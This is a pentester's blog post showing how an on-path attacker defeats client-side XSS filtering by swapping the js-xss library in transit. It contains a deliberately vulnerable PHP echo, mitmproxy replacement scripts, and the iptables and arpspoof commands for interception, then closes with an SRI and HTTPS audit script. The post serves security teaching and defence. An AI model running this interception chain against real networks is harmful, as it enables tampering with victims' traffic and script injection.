MITM XSS Protection – Still Popping Alerts

I recently had to demonstrate the dangers of loading external resources over HTTP, and of relying on security libraries that run on the client side. In this case I went with an attack that MITMs the XSS protection itself, and this was the result.

Vulnerable Application

First, take the following vulnerable application.


<title>Safe from XSS now(?)</title>


I'm no longer vulnerable: <?php echo $_GET['value']; ?>



A simple application that takes a GET parameter and echoes it to the page without any encoding.

MITM XSS Protection - Vulnerable

As you can tell, this application is obviously vulnerable to XSS.

MITM XSS Protection - Alert 1

Securing the Application

In this case, our target smartened up after our earlier attacks and started using a client-side input sanitization library (js-xss, which exposes the filterXSS() function).

Following the example from the library's GitHub page, the target application was now a bit more secure.


<title>Safe from XSS now(?)</title>


I'm no longer vulnerable:
<script src=""></script>
// apply function filterXSS in the same way
var html = filterXSS(decodeURIComponent('<?php echo urlencode($_GET['value']); ?>'));



Now, when we try our previous payload, it no longer works.

MITM XSS Protection - Protected

The reason for this is that the library is now HTML-encoding the tags in our payload before they reach the DOM.

MITM XSS Protection - HTML Encoded

As you can see, the browser now passes the input through filterXSS() before it is written to the page, which means the sanitization happens entirely in the victim's browser, using a script the page fetches over plain HTTP. Note that the urlencode() on the server and the decodeURIComponent() on the client are only there to keep a closing script tag in the parameter from breaking out of the JavaScript string and bypassing this "protection" outright.

MITM XSS Protection - Protection Script

MITM XSS Protection - The Attack

Like any good attacker, we won't stop because of a little client side protection for our XSS attacks.

In this case, I used mitmproxy and a custom script to modify the response. If the request was for, then I replace the content with my own neutered function.

import libmproxy

def response(context, flow):
    url = flow.request.scheme + "://" + + flow.request.path

    if url == "":
        flow.response.code = 200
        flow.response.content = "function filterXSS (input) { return input; }"

To use this script, I set up some iptables rules to redirect ports 80 and 443 to mitmproxy, set up ARP spoofing between my victim and the router, and started mitmproxy in transparent mode (-T). The attacking box also needs IP forwarding enabled (sysctl -w net.ipv4.ip_forward=1); arpspoof does not turn it on for you, and without it every packet from the victim that is not redirected to mitmproxy simply dies on the attacker's machine.

root@kali:~# iptables -t nat -F
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
root@kali:~# arpspoof -i eth1 -t
root@kali:~# arpspoof -i eth1 -t
root@kali:~# mitmproxy --anticache -s -T --host
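As an added example (this is not the script from the post), here is the same attack written against the current mitmproxy addon API, with the matching and replacement logic kept in a plain function so it can be exercised without mitmproxy installed. TARGET_URL is a placeholder I made up; replace it with the src= value the victim's browser actually requests.

```python
"""
mitmproxy addon: serve a neutered filterXSS() for one script URL.

Run (after the iptables redirect and ARP spoofing above):
    mitmproxy --mode transparent --anticache -s neuter_filterxss.py
"""
import re
from typing import Optional

# Assumed location of the js-xss library on the target page (placeholder;
# substitute the real src= value seen in the victim's requests).
TARGET_URL = "http://cdn.example.com/xss/dist/xss.js"

# Same identity function the post used, as bytes so it can be assigned
# directly to the response body.
NEUTERED_JS = b"function filterXSS(input) { return input; }\n"


def normalize(url: str) -> str:
    """Drop query string and fragment so cache-busters like ?v=2 still match."""
    return re.split(r"[?#]", url, maxsplit=1)[0].rstrip("/")


def neutered_body(url: str, body: bytes) -> Optional[bytes]:
    """
    Return the replacement body for a response fetched from TARGET_URL, or
    None when the response should pass through untouched.  The check on the
    original body keeps us from clobbering something that is not actually
    the library (for example a 404 page served at that path).
    """
    if normalize(url) != normalize(TARGET_URL):
        return None
    if b"filterXSS" not in body:
        return None
    return NEUTERED_JS


def response(flow) -> None:
    """mitmproxy hook: called once for every completed server response."""
    # .content is the decoded body (mitmproxy strips gzip etc. for us).
    new_body = neutered_body(flow.request.pretty_url, flow.response.content or b"")
    if new_body is None:
        return
    flow.response.status_code = 200
    flow.response.content = new_body  # mitmproxy recalculates Content-Length
    flow.response.headers["content-type"] = "application/javascript"
    # Do not let the browser cache the real library before the swap, or keep
    # our fake one after the attack ends.
    flow.response.headers["cache-control"] = "no-store"
    for header in ("etag", "last-modified", "expires"):
        flow.response.headers.pop(header, None)
```

Only the port 80 redirect matters for this attack; the 443 redirect in the iptables rules above will produce certificate warnings for every HTTPS site the victim visits unless they already trust the mitmproxy CA, which is exactly why the HTTPS version of this page would not be attackable this way.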

Now, the next time that my "victim" browsed to the vulnerable application, I saw their request for the XSS library.

MITM XSS Protection - mitmproxy

Additionally, the response that mitmproxy sent back to them was my useless version.

MITM XSS Protection - MITM response

Finally, my alert popped, and XSS was successful again!

MITM XSS Protection - Alert Popped

Additionally, you can see that the neutered filterXSS() function, which just returns its input, is the one loaded on the client's side.

MITM XSS Protection - New Method

MITM XSS Protection - Conclusion

While this attack came with a few caveats (the attacker has to be on the victim's local network, the library has to be loaded over plain HTTP, and the attacker has to know which script to replace), it still demonstrates the dangers of HTTP versus HTTPS and of client-side protections: the sanitizer runs in the same browser the attacker is targeting, so anyone who can alter the page or its scripts in transit can simply switch it off. Encoding the value on the server, and serving the page over HTTPS, does not have this problem.

To perform this attack, an attacker only needs to share a network segment with the victim (ARP spoofing works within a single broadcast domain) and some familiarity with the protection being attacked.

Other than that, the attack is (mostly) transparent to the victim, and it could be made even sneakier, since the replacement does not have to be an obvious one-liner.
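The post does not go into it, but the check a defender would reach for here is Subresource Integrity together with HTTPS. The following added example (mine, not the post's) audits a constructed page for scripts an on-path attacker could rewrite, and shows that the integrity hash of the real library rejects the neutered copy. The hosts and paths in SAMPLE_HTML, and the two script bodies, are placeholders I constructed.

```python
import base64
import hashlib
import re
from typing import List, Tuple

# Constructed sample page modelled on the post's second snippet; the hosts
# and paths are placeholders, not the real location of the library.
SAMPLE_HTML = """<html><body>
I'm no longer vulnerable:
<script src="http://cdn.example.com/xss/dist/xss.js"></script>
<script src="https://cdn.example.com/jquery.js"></script>
<script src="https://cdn.example.com/xss/dist/xss.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script>var html = filterXSS(location.search);</script>
</body></html>"""

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')
SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only digests browsers accept


def audit_scripts(html: str) -> List[Tuple[str, str]]:
    """
    Return (src, problem) for each external script that an attacker who can
    tamper with traffic could replace.  Inline scripts are skipped: they are
    exactly as safe as the page that carries them.
    """
    findings = []
    for tag in SCRIPT_TAG.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(1))}
        src = attrs.get("src")
        if not src:
            continue
        if src.lower().startswith("http://"):
            findings.append((src, "plain HTTP: anyone on the path can rewrite the body"))
        elif "integrity" not in attrs:
            findings.append((src, "no integrity attribute: a spoofed or compromised host can serve any body"))
    return findings


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value for a script body: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def integrity_matches(expected: str, body: bytes) -> bool:
    """The check a browser performs before executing a script that carries integrity=."""
    algo, _, _ = expected.partition("-")
    if algo not in SRI_ALGOS:
        return False
    return sri_hash(body, algo) == expected


if __name__ == "__main__":
    # Constructed stand-ins for the real library and the neutered copy.
    real_lib = b"(function(){window.filterXSS=function(s){return s.replace(/</g,'&lt;');};})();"
    fake_lib = b"function filterXSS (input) { return input; }"
    for src, problem in audit_scripts(SAMPLE_HTML):
        print(f"{src}: {problem}")
    tag_hash = sri_hash(real_lib)
    print("integrity=", tag_hash)
    print("real library accepted:", integrity_matches(tag_hash, real_lib))
    print("neutered library accepted:", integrity_matches(tag_hash, fake_lib))
```

Two caveats apply. SRI only protects a script when the page carrying the integrity attribute is itself delivered over HTTPS; an attacker who can rewrite an HTTP page can strip the attribute just as easily as swap the script. And none of this replaces encoding the value on the server, which is the fix that takes the attacker's own browser out of the trust chain.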

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.




Filed under Security Not Included

One Response to MITM XSS Protection – Still Popping Alerts

  1. Josh holmes

    Nice dude!
